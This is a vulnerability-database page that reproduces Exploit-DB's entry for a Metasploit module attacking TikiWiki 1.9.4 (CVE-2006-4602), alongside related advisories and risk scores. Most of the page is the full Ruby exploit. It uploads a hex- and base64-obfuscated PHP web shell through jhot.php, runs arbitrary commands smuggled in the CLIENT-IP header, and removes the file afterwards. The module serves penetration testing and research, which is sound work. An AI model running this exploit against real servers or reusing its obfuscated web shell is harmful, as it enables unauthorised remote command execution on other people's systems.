Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TikiWiki jhot - Remote Command Execution (Metasploit)

🗓️ 25 Jul 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 186 Views

TikiWiki jhot Remote Command Execution, allows arbitrary PHP code execution by uploading file

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2006-4602
25 Jul 201000:00
circl
Check Point Advisories		TikiWiki jhot.php Script File Upload Security Bypass (CVE-2006-4602)
24 Jan 201000:00
checkpoint_advisories
CVE		CVE-2006-4602
7 Sep 200600:00
cve
Cvelist		CVE-2006-4602
7 Sep 200600:00
cvelist
Tenable Nessus		FreeBSD : tikiwiki -- multiple vulnerabilities (e4c62abd-5065-11db-a5ae-00508d6a62df)
2 Oct 200600:00
nessus
Tenable Nessus		GLSA-200609-16 : Tikiwiki: Arbitrary command execution
27 Sep 200600:00
nessus
Tenable Nessus		TikiWiki jhot.php Arbitrary File Upload
4 Sep 200600:00
nessus
Gentoo Linux		Tikiwiki: Arbitrary command execution
26 Sep 200600:00
gentoo
Metasploit		TikiWiki jhot Remote Command Execution
21 Jul 200915:20
metasploit
NVD		CVE-2006-4602
7 Sep 200600:04
nvd
Rows per page
##
# $Id: tikiwiki_jhot_exec.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TikiWiki jhot Remote Command Execution',
			'Description'    => %q{
					TikiWiki contains a flaw that may allow a malicious user to execute
				arbitrary PHP code. The issue is triggered due to the jhot.php script
				not correctly verifying uploaded files. It is possible that the flaw
				may allow arbitrary PHP code execution by uploading a malicious PHP
				script resulting in a loss of integrity.

				The vulnerability was reported in Tikiwiki version 1.9.4.
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					['CVE', '2006-4602'],
					['OSVDB', '28456'],
					['BID', '19819'],
					['URL', 'http://secunia.com/advisories/21733/'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 2 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
			], self.class)
	end

	def check
		res = send_request_raw(
			{
				'uri'     => datastore['URI'] + "/tiki-index.php",
				'method'  => 'GET',
				'headers' =>
					{
						'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
						'Connection' => 'Close',
					}
			}, 25)

		http_fingerprint({ :response => res })  # check method

		if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		create_temp_file()

		command = payload.encoded

		exe_command(command)

		remove_temp_file()
	end

	def create_temp_file
		url_jhot = datastore['URI'] + "/jhot.php"

		scode =
			"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
			"\x64\x65\x72\x3a\x20\x2f\x63\x76\x73\x72\x6f\x6f\x74\x2f\x74\x69" +
			"\x6b\x69\x77\x69\x6b\x69\x2f\x74\x69\x6b\x69\x2f\x74\x69\x6b\x69" +
			"\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e" +
			"\x38\x2e\x32\x2e\x35\x20\x32\x30\x30\x35\x2f\x30\x38\x2f\x32\x32" +
			"\x20\x30\x38\x3a\x30\x30\x3a\x35\x33\x20\x74\x65\x6c\x65\x6e\x69" +
			"\x65\x6b\x6f\x20\x45\x78\x70\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20" +
			"\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30" +
			"\x30\x32\x2d\x32\x30\x30\x35\x2c\x20\x4c\x75\x69\x73\x20\x41\x72" +
			"\x67\x65\x72\x69\x63\x68\x2c\x20\x47\x61\x72\x6c\x61\x6e\x64\x20" +
			"\x46\x6f\x73\x74\x65\x72\x2c\x20\x45\x64\x75\x61\x72\x64\x6f\x20" +
			"\x50\x6f\x6c\x69\x64\x6f\x72\x2c\x20\x65\x74\x2e\x20\x61\x6c\x2e" +
			"\x0d\x0a\x2f\x2f\x20\x41\x6c\x6c\x20\x52\x69\x67\x68\x74\x73\x20" +
			"\x52\x65\x73\x65\x72\x76\x65\x64\x2e\x20\x53\x65\x65\x20\x63\x6f" +
			"\x70\x79\x72\x69\x67\x68\x74\x2e\x74\x78\x74\x20\x66\x6f\x72\x20" +
			"\x64\x65\x74\x61\x69\x6c\x73\x20\x61\x6e\x64\x20\x61\x20\x63\x6f" +
			"\x6d\x70\x6c\x65\x74\x65\x20\x6c\x69\x73\x74\x20\x6f\x66\x20\x61" +
			"\x75\x74\x68\x6f\x72\x73\x2e\x0d\x0a\x2f\x2f\x20\x4c\x69\x63\x65" +
			"\x6e\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\x65\x20\x47" +
			"\x4e\x55\x20\x4c\x45\x53\x53\x45\x52\x20\x47\x45\x4e\x45\x52\x41" +
			"\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x4c\x49\x43\x45\x4e\x53\x45" +
			"\x2e\x20\x53\x65\x65\x20\x6c\x69\x63\x65\x6e\x73\x65\x2e\x74\x78" +
			"\x74\x20\x66\x6f\x72\x20\x64\x65\x74\x61\x69\x6c\x73\x2e\x0d\x0a" +
			"\x0d\x0a\x23\x20\x24\x48\x65\x61\x64\x65\x72\x3a\x20\x2f\x63\x76" +
			"\x73\x72\x6f\x6f\x74\x2f\x74\x69\x6b\x69\x77\x69\x6b\x69\x2f\x74" +
			"\x69\x6b\x69\x2f\x62\x61\x6e\x6e\x65\x72\x5f\x69\x6d\x61\x67\x65" +
			"\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e\x38\x2e\x32\x2e\x35\x20\x32" +
			"\x30\x30\x35\x2f\x30\x38\x2f\x32\x32\x20\x30\x38\x3a\x30\x30\x3a" +
			"\x35\x33\x20\x74\x65\x6c\x65\x6e\x69\x65\x6b\x6f\x20\x45\x78\x70" +
			"\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20\x74\x69\x6b\x69\x77\x69\x6b" +
			"\x69\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x20" +
			"\x73\x63\x72\x69\x70\x74\x0d\x0a\x0d\x0a\x65\x76\x61\x6c\x28\x62" +
			"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22\x5a\x58" +
			"\x4a\x79\x62\x33\x4a\x66\x63\x6d\x56\x77\x62\x33\x4a\x30\x61\x57" +
			"\x35\x6e\x4b\x44\x41\x70\x4f\x33\x4e\x6c\x64\x46\x39\x30\x61\x57" +
			"\x31\x6c\x58\x32\x78\x70\x62\x57\x6c\x30\x4b\x44\x41\x70\x4f\x32" +
			"\x56\x6a\x61\x47\x38\x67\x49\x6d\x31\x35\x58\x32\x52\x6c\x62\x47" +
			"\x6c\x74\x49\x6a\x74\x77\x59\x58\x4e\x7a\x64\x47\x68\x79\x64\x53" +
			"\x67\x6b\x58\x31\x4e\x46\x55\x6c\x5a\x46\x55\x6c\x73\x69\x53\x46" +
			"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
			"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"

		data =
			"-----------------------------7d529a1d23092a\r\n" +
			"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
			scode +
			"\r\n" +
			"-----------------------------7d529a1d23092a--\r\n"

		res = send_request_cgi({
			'uri'     => url_jhot,
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
				{
					'User-Agent'   => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
					'Connection'   => 'Close',
				}
			}, 25)

		if (res and res.message == "OK")
			print_status("Successfully created temporary file.")
		else
			print_error("Error creating temporary file.")
		end
	end

	def exe_command(cmd)
		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"

		res = send_request_raw({
			'uri'     => url_config,
			'method'  => 'GET',
			'headers' =>
				{
					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'CLIENT-IP'  => "#{cmd};",
					'Connection' => 'Close',
				}
			}, 25)

		if (res and res.message == "OK" and res.body.match(/my_delim/m))
			print_status("The server returned            : #{res.code} #{res.message} (#{res.headers['Server']})")

			cmd_output = res.body.match(/my_delim(.*)/m)

			if (cmd_output)
				print_status("Command output from the server :")
				print("\n" + cmd_output[1] + "\n")
			else
				print_error('No command output found. This server may not be vulnerable.')
			end
		else
			print_error("No response from the server")
		end
	end

	def remove_temp_file
		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"

		res = send_request_raw({
			'uri'     => url_config,
			'method'  => 'GET',
			'headers' =>
				{
					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'CLIENT-IP'  => 'rm -f tiki-config.php',
					'Connection' => 'Close',
				}
			}, 25)

		if (res and res.message == "OK")
			print_status("Successfully remove temporary file.")
		else
			print_error("Error removing temporary file.")
		end
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.83363
tikiwikiremote command executionmetasploitarbitrary php codescriptintegrity.
186